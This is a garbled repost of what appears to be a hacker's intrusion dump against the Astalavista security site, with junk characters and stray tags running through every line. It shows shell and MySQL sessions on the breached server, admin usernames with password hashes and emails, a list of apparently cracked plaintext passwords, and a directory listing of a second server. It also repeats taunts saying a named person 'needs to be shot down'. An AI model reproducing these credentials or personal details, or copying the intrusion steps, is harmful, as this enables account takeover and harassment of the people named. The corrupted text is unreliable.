D" d2 f2 F$ }) d" v% n; C <title>ASTALAVISTA.com - Exploits</title>
( P8 f- H% g+ p1 O. B! g <link>http://www.astalavista.com/exploits</link> U- M+ V6 y, u3 C1 F" C
<description>All availably Exploits.</description>
+ K$ U. F6 m! W k2 m0 k <language>en-us</language>1 a; j* m, O$ k: x. m
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>; L) E3 i' I, c
<docs>http://blogs.law.harvard.edu/tech/rss</docs>+ Q+ _) R r( V. _! J* a% r2 u
<generator>Astalavista.com</generator>
+ p$ ]1 T2 J9 d: E" R; r# Y <webMaster>info@astalavista.com</webMaster>’ . $items . ‘9 o2 }& \0 k4 |5 X V
</channel>
7 q# {$ `, Z- U/ Y; |</rss>’;
: {% A. h% p: y! g( q5 R7 G5 d, Z+ A. X! b4 G
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
8 ^4 L) T$ q* {( ^ P" J unlink (FULLPATH . ‘/feed/exploits.xml’);' i) \" W. T; f' J" u
}
- P8 I4 E& g+ R! n0 x: g$ h. o* q6 o# V3 s/ ~) ?
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
# O9 t7 N, }+ g) S( Q1 m+ ~5 f1 T[snip]( J" G F. ~, [2 _/ P! b3 X
( I$ y! A, H4 D
sh-3.2$ cat exploits.sh- o* l" [- @3 ?& X/ v
#!/bin/sh$ I P9 A& l- Q) G) A# f" x: y
& f+ I: {3 w Y1 G* l/ z###########################################################' a4 X% B4 _6 O8 W' v$ C4 i+ X
# #9 `: G' e+ N% r0 O
# Title: milw0rm exploits adder #1 n6 O6 r. ?' y# D" ?
# Description: Add all milw0rm exploits to the #3 h+ D8 f* \7 P9 A0 Q. N
# Astalavista.com database ## W- F7 L% K; n
# #, V- P( V" F6 Q, b7 ^, F0 J
# Company: Astalavista Group #; v' w4 ? Y' F, R
# Author: Paulo M. Santos #* Z1 R) t8 q( ?4 D
# E-Mail: 链接标记paulo.santos@astalavista.ch #
, e: d* D- N; Z. I# #
* l% K( n& ~. x0 e& s###########################################################
3 L+ m' D) z. K& W/ ~) Q
& c! R6 e. j3 o% a# path
& }' O; ^ s5 w4 ?0 R, |# Uthis_path=/home/com/public_html/modifications/cronjobs) F8 ]% F/ z2 m, k' {' d
+ y+ ~* q- s0 a2 H$ U
# change directory# E6 ]4 b; {# f+ y2 A3 S
cd $this_path
. ]8 j' j/ |2 Q' T Q3 M- wcd tmp/7 L& Y2 l$ N. H" m3 M/ b3 D: L
( k9 ^- G8 D1 Z2 m0 I5 X+ v j+ }) m# delete files K9 g5 n8 z' l9 |
rm -rf milw0rm.tar.* &8 {9 |2 i3 g i4 P# q+ D
rm -rf milw0rm/ &
# `' O: L: B6 e6 F$ K) E. d
3 k$ a c4 q# E2 E& `2 C6 n+ f# o( {# wget milw0rm paket' i- {; v7 l7 P; L3 O
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
0 m2 J1 j# e6 t( q/ ]# h D8 Z& P+ f& s% \) q/ v
# extract milw0rm paket- O0 O0 U Z3 K
tar -xvf milw0rm.tar.bz2& i1 G$ `! X, v) x/ }5 C- t7 s4 ^
( A: y* ^: K& N8 x& A$ z# change owner% _+ b1 P6 U$ q) i' t+ v3 h+ o1 T
chown -R com .7 N- y" S) [! Y. O
chgrp -R com .- [5 j6 h6 f0 l. X
+ u( Y" F8 J, Y
# execute php script
+ P% y! ?/ S7 ]" c& Ucd $this_path
+ ~' W7 Z+ s7 i aphp -q exploits.php; Q4 f0 q+ |. F) p% G
2 R6 h7 R6 M& F( R# delete files" M( E4 f) S8 D2 h k0 Z: f6 F8 Y$ g
rm -rf tmp/milw0rm.tar.*3 m3 |$ K! T! ^* Q0 Y0 m2 ~1 C
rm -rf tmp/milw0rm/
7 H% t8 }# H% m; x. o0 B. ?" a( i0 [3 b0 X! Z0 M- D, l7 q
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”6 X: l4 W0 W! {( N9 p; w
Paulo M. Santos needs to be shot down.. B+ f; w" n" S* B* A3 W
& C K$ _. L' }1 L2 V) H8 Zmysql -u contrexxuser2 -p
( c" i1 \% ]! t$ p( E, A: `9 S3 L! WEnter password:/ S& o3 w3 B2 K1 M, R
Welcome to the MySQL monitor. Commands end with ; or \g.
. Q- D- Z$ }2 y- j sYour MySQL connection id is 261694
) B: ?) W+ \7 |1 l+ v2 l' vServer version: 5.0.45-community-log MySQL Community Edition (GPL)
1 Y- `4 O) P, f$ @
c* z* S. L) j) E" x2 a* J* `+ ^$ lType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.- h! d9 q4 Z1 r' U) r- e' n
4 J8 ^4 R! @/ a+ J
mysql> show databases;
$ N- P0 @7 a6 z* \0 F3 I* n$ s% G+——————–+
* p0 X! K* M4 t6 }7 q8 g| Database |
) L1 d- N! N w0 \- f1 b6 F+——————–+. B4 a% Z' Q, O( r+ y) s/ F7 K
| information_schema |
% k* A" h' Y9 n1 O| com_contrexx2 |
/ j. o7 i `# k* R; ~) }) S2 P| com_contrexx2_live |
3 ]" a0 j% J$ }% || test |& Q# B5 ^" p) V
+——————–+
0 t* A" {! P/ D1 U4 y4 rows in set (0.00 sec)1 R+ ~# L1 r6 }: R- |8 \: E" P5 A
- L6 x& Y; y2 n, c
mysql> use com_contrexx2_live
" |; s$ t9 h/ z$ b( Y! U/ E* CDatabase changed
. m. r2 w1 ^% D+ ?! f2 o" Dmysql> show tables;
1 @; N |2 ?4 Q- }1 z7 t+————————————————–+
! Y ~4 I' ?3 |4 ~) ~1 u+ Q& b| Tables_in_com_contrexx2_live |; `; `: l1 c5 A# |5 I5 \3 y( S
+————————————————–+
2 h" ^5 }- i( ]' o| cc_banner_counter |6 B% B3 S5 V' s2 I+ n1 |% x
| cc_search_counter |
1 `+ ?) U; l, ^4 C' R& ~| contrexx_access_group_dynamic_ids |0 w# S1 n) D5 n2 v& L
| contrexx_access_group_static_ids |3 m/ ~; U" f" M: ~
| contrexx_access_rel_user_group |
9 ~% O5 q: ~+ B1 ^! w4 O6 i- o0 ^& V| contrexx_access_settings |
/ m% r/ E4 p( T5 y| contrexx_access_user_attribute |
8 t6 |: Z' n( w( q7 y: j9 B| contrexx_access_user_attribute_name |# s! s0 `" b! n* _7 _0 h- \
| contrexx_access_user_attribute_value |2 B+ ?/ r& R+ m; \# F' o
| contrexx_access_user_core_attribute |0 U, ^/ O! D6 J! `6 [% U
| contrexx_access_user_groups |3 O; T/ G: p! H
| contrexx_access_user_mail |
1 @- d7 E* {" B# E9 `$ o& {| contrexx_access_user_profile |
$ C. P5 C+ b0 P, T2 R# y| contrexx_access_user_title |
0 ?- Q+ [! K' y| contrexx_access_user_validity |
3 P ^- C0 N0 N| contrexx_access_users |' ?% ? I( a/ n) b+ |
| contrexx_backend_areas |
. e1 N1 D' B& f6 G| contrexx_backups |4 k9 F9 {, A, O. L& M: K% |
| contrexx_content |* C, y/ v' P1 Z% E$ ?+ }
| contrexx_content_history |
5 p* ]; m4 D$ p* r| contrexx_content_logfile |
4 y6 a- n. j: l# N: D3 u. I| contrexx_content_navigation |. h" T# D" P/ A
| contrexx_content_navigation_history |
; T: _- h' z% J| contrexx_ids |6 ?. ]# N6 b4 i
| contrexx_languages |6 {2 T4 I) E% |& j/ U, M; R
| contrexx_lib_country |- B2 \- [- ~- [
| contrexx_log |
/ F# p$ `6 p m. ]| contrexx_module_alias_source |0 \* Z4 d6 g8 R$ S& ^" g2 M' w8 Z
| contrexx_module_alias_target |2 {+ Y- a; p. J/ X7 J
| contrexx_module_block_blocks |
2 [- W) N: Y: H| contrexx_module_block_rel_lang |
7 v8 S9 O+ y, [6 ]| contrexx_module_block_rel_pages |
( c# r% n; H/ c( k) m. x| contrexx_module_block_settings |
2 {% P/ o0 J0 ~/ A" q `| contrexx_module_blog_categories |
+ C% R9 r4 n5 H0 C0 Q' ]0 f| contrexx_module_blog_comments |
$ J( \/ a& m C. _! G( G' W; @' f| contrexx_module_blog_message_to_category |( n' r- ^$ C9 c4 O+ u% X5 o+ j; J
| contrexx_module_blog_messages |
. q0 L; {' m+ M8 B) d. H| contrexx_module_blog_messages_lang |" w- j0 y& H) E4 W" l9 l) z j
| contrexx_module_blog_networks |: `* L, z/ W$ y$ ?, h5 ~0 g! ^$ e
| contrexx_module_blog_networks_lang |4 @ F1 q z: ~# [' |$ V: D4 F
| contrexx_module_blog_settings |
' S4 ^4 q6 y3 j. K& Y! y; | p- p| contrexx_module_blog_votes |
2 v- t' I. L, R; }$ ~' J4 y| contrexx_module_calendar |
2 i$ j! u! Q9 W" _+ }5 R' \| contrexx_module_calendar_access |
, M* ?( A/ K- }, c3 O| contrexx_module_calendar_categories |
n1 ?: W& _8 T+ {3 {| contrexx_module_calendar_form_data |9 x \/ b3 K- }9 {
| contrexx_module_calendar_form_fields |9 O( X" A" B4 m3 j6 s
| contrexx_module_calendar_registrations |9 r# d$ x* n5 j" g/ v
| contrexx_module_calendar_settings |
6 k# \1 c) C- O# o& m* z. }& h3 P| contrexx_module_calendar_style |6 a: S( C" R4 H+ ?( w
| contrexx_module_contact_form |% {1 z7 `7 }: h& s3 j! H: |7 v
| contrexx_module_contact_form_data |. }6 K+ v z \, d' E
| contrexx_module_contact_form_field |3 q* r& I6 d O5 z7 n
| contrexx_module_contact_settings |" V$ M. ]0 ^. @5 I1 G
| contrexx_module_data_categories |
" M0 [" F( {. v! }| contrexx_module_data_message_to_category |
0 K2 J% S6 s3 O9 r0 K/ B6 w| contrexx_module_data_messages |& R# B' V9 [( y
| contrexx_module_data_messages_lang |- {6 \ Y" {) P: Y3 L q
| contrexx_module_data_placeholders |
/ ~; _9 I- Z" Q) v. u; P a| contrexx_module_data_settings |$ t* Z- Y4 c1 _; h! k- C' @! l
| contrexx_module_directory_access |8 ?9 C7 _. N4 h9 d- m
| contrexx_module_directory_categories |1 B. [! n8 D5 `& I, ~3 f
| contrexx_module_directory_dir |
; a2 Q5 m, Q: `| contrexx_module_directory_inputfields |
. Y! y1 T; }# _' o3 \| contrexx_module_directory_levels |
2 R8 T6 E: R/ U* A| contrexx_module_directory_mail |
! j6 V4 q$ U. t E| contrexx_module_directory_rel_dir_cat |
" M0 Z5 w+ g; ?0 J9 p0 r| contrexx_module_directory_rel_dir_level |
8 U9 @3 C- b- k( S5 s| contrexx_module_directory_settings |
! ^$ D8 B9 r* y) v: J| contrexx_module_directory_settings_google |
5 m2 P; U# v1 F N" Y6 @; [| contrexx_module_directory_vote |. h8 E3 g* ]$ E; g0 F6 `- w
| contrexx_module_docsys |7 R c% Q) Q: m( ?/ `( L
| contrexx_module_docsys_categories |
$ A/ J- a1 a; k! a| contrexx_module_egov_configuration |. v6 u S1 t% ?0 X6 K
| contrexx_module_egov_orders |& h8 z, Z" s7 i* V" A! p
| contrexx_module_egov_product_calendar |" z2 _5 b* L4 g& R, Z
| contrexx_module_egov_product_fields |
h7 I2 a! w0 u4 ~; v) B| contrexx_module_egov_products |
1 o6 R. C$ a% j) f& b" C9 m| contrexx_module_egov_settings |8 Z- {% y \' ?$ R$ @, s
| contrexx_module_exploits |
x: D3 N6 [) t! c" y3 `| contrexx_module_exploits_categories |+ J1 X% [2 J( L7 m, c4 Y5 R/ c
| contrexx_module_feed_category |
2 a7 @6 a5 n. h1 k5 G6 K4 _, ]| contrexx_module_feed_news |
, }9 F I1 j& G) C: s| contrexx_module_feed_newsml_association | c( P# p& h" b1 g# `- A6 R; o8 V0 n
| contrexx_module_feed_newsml_categories |( k! q7 I( p- v4 U1 K! S5 [$ ^: l
| contrexx_module_feed_newsml_documents |+ C! @0 r/ }/ t1 `8 r! j) b! G5 u) b
| contrexx_module_feed_newsml_providers |
0 D" A. Q% B' v/ i# H! ^| contrexx_module_forum_access |
+ p& l- j* w0 x2 I/ y8 o# ]6 A: l* B! L| contrexx_module_forum_categories |
, q2 X, f. n4 A5 y| contrexx_module_forum_categories_lang |, \9 {6 E& y) F: k7 j2 I
| contrexx_module_forum_notification |
$ l% O i+ P: I( A1 j6 Z| contrexx_module_forum_postings |
- |0 W& d$ o4 O| contrexx_module_forum_rating |4 K3 }- Y- m0 U2 V+ M
| contrexx_module_forum_settings |: y9 `' ^3 }; P9 N9 x5 ?
| contrexx_module_forum_statistics |5 d( n9 r$ e; N0 o! ~, o
| contrexx_module_gallery_categories |
, _5 |4 ^/ d) c0 [+ v, `3 T/ \| contrexx_module_gallery_comments |. z6 ~1 w. p5 _) n* z# d! Z
| contrexx_module_gallery_language | U5 m' O1 H. k- B
| contrexx_module_gallery_language_pics |
2 u7 z0 n# G! i0 w| contrexx_module_gallery_pictures |8 F( r5 F5 L+ L% Z! e: X, t) C
| contrexx_module_gallery_settings |
* r3 C; p- X2 |& j" u p) || contrexx_module_gallery_votes |
7 y* D8 t: E* P* j1 R" o( M| contrexx_module_guestbook |
$ ^) ~ U A/ v( E6 S/ G# r6 ^/ N| contrexx_module_guestbook_settings |
9 v2 i- k/ @" \8 V2 ]. v| contrexx_module_livecam |
. O! m+ f2 \7 F4 i9 }| contrexx_module_livecam_settings |
) W, H0 ^- w1 R6 H. `8 Q+ V| contrexx_module_market |) J P) \0 W# I V
| contrexx_module_market_access |
( Y# Y4 y5 O) u$ `6 ^: I; B9 d' j| contrexx_module_market_categories |" u: N4 n* m7 C, L5 N6 t0 W
| contrexx_module_market_mail |% {) g, N' E5 S! d) I5 f
| contrexx_module_market_paypal |
9 V0 A, n6 R# U5 ]6 m# P| contrexx_module_market_settings |: ?$ d; L* c- C' D* d* t. l% _5 S
| contrexx_module_market_spez_fields |
* z/ \1 D' ^5 G) R+ }+ p8 p| contrexx_module_mediadir_access |+ z& E/ z: c: _* B
| contrexx_module_mediadir_categories |
8 F$ Q' G1 b. G% X& g( X( ^4 y| contrexx_module_mediadir_comments |
( L( R6 u+ I; e| contrexx_module_mediadir_dir |
2 Z% ~) U( m9 b$ i/ V5 L4 q| contrexx_module_mediadir_inputfields |; o- z* o( ?0 {
| contrexx_module_mediadir_levels |
g: {) Q: F: E- ~| contrexx_module_mediadir_mail |
/ B! K+ I* ^ D7 d4 p| contrexx_module_mediadir_rel_dir_cat |5 _8 Y F4 ~7 p2 n! J$ P
| contrexx_module_mediadir_rel_dir_level |- |; G+ \& `; h, G) x1 Y
| contrexx_module_mediadir_reports |
) P3 [; ^$ b* y3 c/ L: O- p| contrexx_module_mediadir_settings |
& v: ]$ ^+ @0 K* s' K. I| contrexx_module_mediadir_settings_google |
9 Q4 w2 a& @* u| contrexx_module_mediadir_vote |9 r& |4 y0 v' N3 a: N/ [7 }
| contrexx_module_memberdir_directories |' p& d8 Y# g* \0 y) `
| contrexx_module_memberdir_name |
6 f4 Q1 _2 B! m' U| contrexx_module_memberdir_settings |. d8 W- K7 A( }, _0 n
| contrexx_module_memberdir_values |5 S- B8 ]8 h8 o7 E
| contrexx_module_nettools_allowed_groups | `5 y% h Q5 N4 h+ R( S9 R; l6 }
| contrexx_module_nettools_settings |. g' M4 _; L. G$ k
| contrexx_module_news |
6 p: z" H% u( g% X- W3 _! p| contrexx_module_news_access |6 Z7 X1 B6 I; O/ _9 m3 I" p* z
| contrexx_module_news_categories |
( _$ f; o: D0 I( w5 l! S& h| contrexx_module_news_settings |
0 }+ c( s) b* A j0 Y& o' y& l| contrexx_module_news_teaser_frame |
0 |8 S4 E3 B! f7 C| contrexx_module_news_teaser_frame_templates |0 w1 ~5 z; ?; V: O R
| contrexx_module_news_ticker |& M- H4 x. j8 w) h+ `# H7 w
| contrexx_module_newsletter |$ c+ n5 a+ }& C4 `
| contrexx_module_newsletter_attachment |
$ l: s: J8 `5 F( q) c| contrexx_module_newsletter_category |
) {/ n9 o& `6 o1 X| contrexx_module_newsletter_confirm_mail |
) S: G% W7 M0 N+ C: z| contrexx_module_newsletter_rel_cat_news |/ L9 B& i6 e) L J! V- A( Q" s
| contrexx_module_newsletter_rel_user_cat |0 D& j# m2 e+ l; T5 o
| contrexx_module_newsletter_settings |
' K+ l9 y9 F [$ H| contrexx_module_newsletter_template |2 q% P* F: e* h j5 m
| contrexx_module_newsletter_tmp_sending |
+ s8 w% r- ^- ~' v| contrexx_module_newsletter_user |
& r6 L% r4 l: h/ X| contrexx_module_newsletter_user_title |* m6 |) g0 \0 Q7 s" G! r
| contrexx_module_onlinetools_defaultports |
% i, d8 |: ?# Q; j! H| contrexx_module_onlinetools_defaultports_back |
& ~+ }- A( T( S5 P5 g# U| contrexx_module_onlinetools_geolitecity_blocks |8 i2 F/ A# ]! u: T
| contrexx_module_onlinetools_geolitecity_country |% N4 c8 h; Y P/ Z$ I: M
| contrexx_module_onlinetools_geolitecity_location |
4 a2 z E( B2 E| contrexx_module_podcast_category |5 Z- P& M, e/ V
| contrexx_module_podcast_medium |
# k+ R4 J2 P' g| contrexx_module_podcast_rel_category_lang |
# s0 K7 @- k7 p1 Z/ |% k| contrexx_module_podcast_rel_medium_category |! \3 [" D- b% W) E' o! @! }/ u( l
| contrexx_module_podcast_settings |4 f1 t4 v3 d% F9 w2 M' R
| contrexx_module_podcast_template |1 [2 z! N8 T. \
| contrexx_module_proxydb |6 ?' \& o- v9 h q8 K0 V
| contrexx_module_recommend |* ]6 h# f; D: E: Q, n# c
| contrexx_module_repository |6 I* J1 [5 [$ M- ^7 ]
| contrexx_module_securitynews_cats |
4 Q: N$ w. Y1 d| contrexx_module_securitynews_feeds |" G" s9 D! |& I5 G! ]- J
| contrexx_module_securitynews_news |
2 J* ?- s1 q/ P" R% S5 F* A! W2 z$ V| contrexx_module_shop_categories |
5 w& g' f+ d2 d, N( Q6 I+ B| contrexx_module_shop_config |7 v3 F3 {5 t# b( _3 e, A r
| contrexx_module_shop_countries |
# D* k$ X0 h( l0 { X q| contrexx_module_shop_currencies |/ E4 {# [: {+ _: v1 o* `2 c
| contrexx_module_shop_customers |1 r4 Z4 u9 i m
| contrexx_module_shop_importimg |
* j, p: a) C: e3 j6 }| contrexx_module_shop_lsv |" f7 i( v- _& Y! @3 |
| contrexx_module_shop_mail |+ f0 N) b) i8 F9 i( }
| contrexx_module_shop_mail_content |; [- I# O# i' ?' u/ v' s) i
| contrexx_module_shop_manufacturer |2 l) r; u( W5 ]
| contrexx_module_shop_order_items |1 d% a1 q6 p% X
| contrexx_module_shop_order_items_attributes |
2 U4 B- p5 t$ _8 b" I5 `| contrexx_module_shop_orders |
0 J- {$ s% n x' U2 ^. I| contrexx_module_shop_payment |
+ O, B! \4 b- m| contrexx_module_shop_payment_processors |
9 G3 F$ M' q& U% C! J1 a' |: r# R| contrexx_module_shop_pricelists |; ?0 M2 }' w; C9 H
| contrexx_module_shop_products |4 y2 y4 z2 S, ~6 G' t: }
| contrexx_module_shop_products_attributes |4 \* L5 r* f- v$ N8 I4 x4 H
| contrexx_module_shop_products_attributes_name |
1 v% ^/ o' v+ Q% j' o d% ~| contrexx_module_shop_products_attributes_value |0 \$ `9 ^; R/ C( g
| contrexx_module_shop_products_downloads |
9 B1 m, n. v4 Y5 D! m- C3 }" V| contrexx_module_shop_rel_countries |' u! P$ I6 i* k4 g, n9 ?& C. I- ~! d
| contrexx_module_shop_rel_payment |) P* p$ ]9 }0 A. ]% i" N
| contrexx_module_shop_rel_shipment | P) p; L# X" }
| contrexx_module_shop_shipment_cost |
1 g/ a d! e& m# z| contrexx_module_shop_shipper |! T+ y9 y; e: f; X2 R5 s/ `: D/ u1 Z
| contrexx_module_shop_vat |
7 P( f7 k9 f1 ]- ^! ?! x| contrexx_module_shop_zones |
" U% }! }+ {9 w6 X| contrexx_module_u2u_address_list |
# E7 q# g1 ~+ H7 c, ]9 o| contrexx_module_u2u_message_log |! ]1 m5 H1 J; w+ E% @# }4 q; Z
| contrexx_module_u2u_sent_messages |6 F; s+ B0 Y: n0 q5 A8 I. n1 H
| contrexx_module_u2u_settings |) z7 M2 [ ~. N* J2 ?; p& z
| contrexx_module_u2u_user_log |
1 ?: c0 }6 m8 o0 d0 Y4 @0 j. B2 F8 f| contrexx_modules |7 {- `) G. p; W' T" \/ c
| contrexx_sessions |& u" b% ~* j8 K5 Q; A
| contrexx_settings |
4 Y R7 T$ H; I| contrexx_settings_smtp |
f9 B: p: m8 E1 t+ E( V| contrexx_skins |
( I& C4 Q. M7 l" x| contrexx_stats_browser |5 L, H( v6 C5 S5 @
| contrexx_stats_colourdepth |
Q/ ]! x( C0 O3 m1 v8 I| contrexx_stats_config |
' X5 L" O3 t; r0 U$ H0 M| contrexx_stats_country |
# l* p5 S2 P. e0 V% C6 |9 L| contrexx_stats_hostname |2 d/ ?" {* A( p, P( s* } `4 M
| contrexx_stats_javascript |
% `. F$ L: G$ {| contrexx_stats_operatingsystem |
2 [3 B) D4 T$ b) o3 X| contrexx_stats_referer |$ A* W; k0 ?1 @( }+ g
| contrexx_stats_requests |4 ^3 i" I: n0 @( J+ X( H
| contrexx_stats_requests_summary |
5 T. s/ d+ f1 ?! @8 r( D4 K) V' T3 C| contrexx_stats_screenresolution |3 D; @5 w1 w1 @% f* L8 |
| contrexx_stats_search |
' P$ ]7 \0 R' i: t" E6 l| contrexx_stats_spiders |
2 I# _8 P0 G$ Y' R| contrexx_stats_spiders_summary |
! d( x$ i' n: q7 || contrexx_stats_visitors |/ |3 I7 Z" V; t, q: ^2 x+ n
| contrexx_stats_visitors_summary |9 T6 |$ p- X; {* a$ ?, k6 y6 M$ _
| contrexx_voting_additionaldata |5 H ~% l& U0 {7 J p
| contrexx_voting_email |; T6 y# \2 X8 a" l
| contrexx_voting_rel_email_system |5 _" u! y0 W* g
| contrexx_voting_results |8 B3 M8 @, c3 L" d; f: G
| contrexx_voting_system |- `, A* F; B+ A/ Q- I+ J' G" d
| foo |' d8 g! c3 K7 w! e
+————————————————–+
8 h; ]- t. D' l W: ^9 h227 rows in set (0.01 sec)4 C2 d% J7 }0 X
& P. q! L. Q3 Q$ B# e0 @8 m- jmysql> select count(*) as skids from contrexx_access_users;
4 N2 V$ O1 i6 r8 T3 |! \1 u+——-+& H5 ]$ O* W+ {7 d$ W" b
| skids |! h! K2 O3 O6 S( p$ O
+——-+5 q6 |/ x" _2 u5 q5 ^, I) I a; w
| 53699 |
" z4 X$ S9 t/ i/ h! O+——-+5 j2 ]& f3 Z- d2 M; {% g9 N
1 row in set (0.00 sec)
2 u2 ]# G1 J! S% S. X* r2 n
5 N, d, s+ S" W6 O0 c: L: k4 S- @mysql> describe contrexx_access_users;& |8 N7 Q$ x' @+ F6 n) I
+——————+——————————————+——+—–+————–+—————-+! ^3 q% v' x9 C; `" C; n' a
| Field | Type | Null | Key | Default | Extra |
) D" R& [( s4 Q4 X7 W6 U+——————+——————————————+——+—–+————–+—————-+
. N8 }3 g( D6 p" E6 L| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
" [3 Q) e1 G0 v! ]3 u| is_admin | tinyint(1) unsigned | NO | | 0 | |# A$ t- r/ }; Q' @3 K: z ?
| username | varchar(40) | YES | MUL | NULL | |
" E! \& t& a4 \, H, S| password | varchar(32) | YES | | NULL | |$ r. E0 j! K! q3 x1 Q, o
| regdate | int(14) unsigned | NO | | 0 | |
3 Q/ ^6 H; r8 L| expiration | int(14) unsigned | NO | | 0 | |; ?) A# `& V% c
| validity | int(10) unsigned | NO | | 0 | |
# R5 `# L+ r( N; {| last_auth | int(14) unsigned | NO | | 0 | |
0 W/ K# G* I* E| last_activity | int(14) unsigned | NO | | 0 | |
+ ~2 j$ J9 y p| email | varchar(255) | YES | | NULL | |+ d; {+ A& Y1 h; o# c9 {
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
) n, r. k$ N7 Y: H) t, U# ^* b| frontend_lang_id | int(2) unsigned | NO | | 0 | |
# p" o1 A& J1 b% Q4 r; a% S| backend_lang_id | int(2) unsigned | NO | | 0 | |
1 B$ a7 u& U; x1 J. W/ |- F/ F| active | tinyint(1) | NO | | 0 | |
9 g- g K6 S2 M/ G( |$ C, C| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |( P" X a& T! y3 |! e( u
| restore_key | varchar(32) | NO | | | |
; h+ _9 G# G" X5 N' N( z| restore_key_time | int(14) unsigned | NO | | 0 | |9 a- g- Z/ W( t( s
| u2u_active | enum(’0′,’1′) | NO | | 1 | |4 o q4 M* v* h% I% V
+——————+——————————————+——+—–+————–+—————-+
. A# v* L4 l$ E6 P; T1 B18 rows in set (0.00 sec)
/ T- C. J" n$ }# z
. v" r3 g' B, |mysql> select username,password,email from contrexx_access_users where is_admin = 1;
) L; V( m, C7 p" e& ~+————+———————————-+—————————–+' o+ u/ |* D6 K7 n3 h2 d0 o* S" a
| username | password | email |) [% ?1 g; i* j- W1 z! b
+————+———————————-+—————————–+: D& ]) Q" d" l
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
- k7 e3 ^9 }# y$ h| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |( k* d, q1 i" L3 U
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
- n! o+ Y' u5 \0 K1 c6 m| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |' ^3 T' ^4 O6 g4 k6 K& J
+————+———————————-+—————————–+& x g1 p$ e: G9 V1 L: G: }9 s
4 rows in set (0.04 sec)% ]% i* i6 h! I( S* D
7 D. K& L, i* r4 ~mysql> exit;
4 X2 D9 c* \3 X- ^8 r4 K1 vBye- @4 p/ L7 \, W: Y! p
+ v* J! k( _: L
[~] There you go, your “team of security and IT professionals” is a joke." h8 r% R# R6 U+ [4 l& y5 w9 r
/ ^, O: G! e: z+——————————+
, f/ b" A' R, b# T/ b- N; a/ e' Fsystem:f82BN3+_*9 D( n0 Q" e1 r/ Y: ~
Be1er0ph0r:belerophor4astacom! \; {2 V3 L0 o) J6 c7 `
prozac:asta4cms!
D; t$ Z& R7 V5 t7 V* {: acommander:mpbdaagf6m
, c5 c: t" l% ?. Q- Gsykadul:ak29eral
& p& H8 l& j/ M& n+ F6 K ~* `+ ]+——————————+
2 p- L* O; q- X- |3 F6 l
! i2 Y# E0 R. A7 ?! [[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
6 Y) u# M0 h9 _4 Z7 X' e…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.5 y! A& t; G' a/ G' V+ o, l& y7 |1 D
% h: x- C; ~' S0 e[~] Lets move to astalavista.net now,) X; E5 Q/ f& _ p2 ~
2 s* H/ j/ x' ~
From <链接标记[url]https://www.astalavista.net/[/url]>:! ~9 t6 i" [" [. y" m
>> Everyone knows that the best defense is a good offense.
; p; l7 {+ \/ {1 C% u- K>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.6 [5 z( l1 }. ^( q! l- `
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
2 {* E* M3 v/ a3 q9 \) E% A>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
* V r! p3 z* W( s/ ?+ Z
. T. { Q% m( e) F1 ~>> Go ahead, try and hack our server . in a completely legal way!
. C7 \& T5 L, R4 X, x; ^2 @6 x/ M>> Learn by doing: We offer our members tricky tasks and challenges on an2 J# [: m" a" f: m% ?. ?" H
>> ongoing basis so you can test your knowledge and abilities. You can also
# n1 @5 X& D0 h2 J>> demonstrate what you.ve mastered by taking part in regular hacker contests; D6 Y0 y4 X- S) |( j( y( u1 O0 u
>> and war games
. i+ l z! b" A) _3 Q6 N1 x- u6 Q+ T* f/ {6 u- m! b
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
5 B% g0 b" P+ V, N- h
% ]" ~4 X! \" i" r[-] Tricky task: Find home dir of astalavista.net
9 K* M- h7 J# r# \: x
& B+ z W# W5 ?6 tsh-3.2$ ls -la ~astanet+ l T' }( y9 M" z" g0 b6 Z6 b
total 48
( p) K/ o: o& D) hdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .7 I; T1 X7 ~ ^: o0 g4 i2 U
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 E% y3 d" K3 U, v
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
+ {) L) A( `8 B) S8 t) z0 V) H-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history; E0 j* S' Z5 F) T8 ^' S% E
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
! N3 b& z U( p% _& W-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
3 Z z. } P) n5 T6 B-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc k* o: `; H7 l9 i, n
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
1 p. o/ g1 d1 C$ {$ hdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap0 ^7 ^/ h6 s+ h, i+ { A! M" O9 z
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail! M( ]+ ^$ c" x! q/ @# Z
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
$ X3 y. O3 ~& e2 z( V9 b7 C-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow- ]6 P9 w9 k/ X+ P
. `# ^4 c) `5 ^& p' C
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
3 F5 @: R4 {. ~& F: X2 lsh-3.2$ ls -la
* s3 q* S: A- J' D' e( _, e$ Etotal 200+ T G- R% Z& g: K e
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .- \) J( f5 q' Z( j6 V1 h
